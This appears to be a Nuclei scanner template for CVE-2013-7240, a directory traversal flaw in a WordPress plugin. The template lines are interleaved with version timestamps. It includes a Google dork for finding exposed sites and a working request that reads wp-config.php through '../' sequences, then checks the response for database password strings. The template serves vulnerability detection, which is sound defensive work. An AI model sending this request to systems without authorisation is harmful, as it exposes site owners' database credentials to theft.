2021-07-25 23:49:51 +00:00
id : CVE-2013-7240
info :
name : WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal
author : daffainfo
2023-07-11 19:49:27 +00:00
severity : medium
2022-02-25 14:32:23 +00:00
description : A directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter.
2021-08-18 11:37:49 +00:00
reference :
2021-08-19 14:44:46 +00:00
- https://www.exploit-db.com/exploits/38936
- https://nvd.nist.gov/vuln/detail/CVE-2013-7240
2022-02-25 14:32:23 +00:00
- https://wordpress.org/support/topic/security-vulnerability-cve-2013-7240-directory-traversal/
2022-05-17 09:18:12 +00:00
- http://seclists.org/oss-sec/2013/q4/570
2023-07-11 19:49:27 +00:00
- http://seclists.org/oss-sec/2013/q4/566
2021-09-30 21:16:15 +00:00
classification :
2023-07-11 19:49:27 +00:00
cvss-metrics : CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score : 5
2021-09-30 21:16:15 +00:00
cve-id : CVE-2013-7240
cwe-id : CWE-22
2023-07-11 19:49:27 +00:00
epss-score : 0.19842
cpe : cpe:2.3:a:westerndeal:advanced_dewplayer:1.2:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile : 0.95661
2022-07-11 17:27:14 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2022-07-11 17:27:14 +00:00
google-query : inurl:"/wp-content/plugins/advanced-dewplayer/"
2023-07-11 19:49:27 +00:00
vendor : westerndeal
product : advanced_dewplayer
2022-08-27 04:41:18 +00:00
tags : wp-plugin,lfi,edb,seclists,cve,cve2013,wordpress
2021-07-26 08:02:53 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-25 23:49:51 +00:00
- method : GET
path :
2021-07-26 08:02:53 +00:00
- '{{BaseURL}}/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php'
2021-07-25 23:49:51 +00:00
matchers-condition : and
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : body
2021-07-25 23:49:51 +00:00
words :
- "DB_NAME"
- "DB_PASSWORD"
2021-07-26 08:02:53 +00:00
- "DB_HOST"
- "The base configurations of the WordPress"
2021-07-25 23:49:51 +00:00
condition : and
- type : status
status :
- 200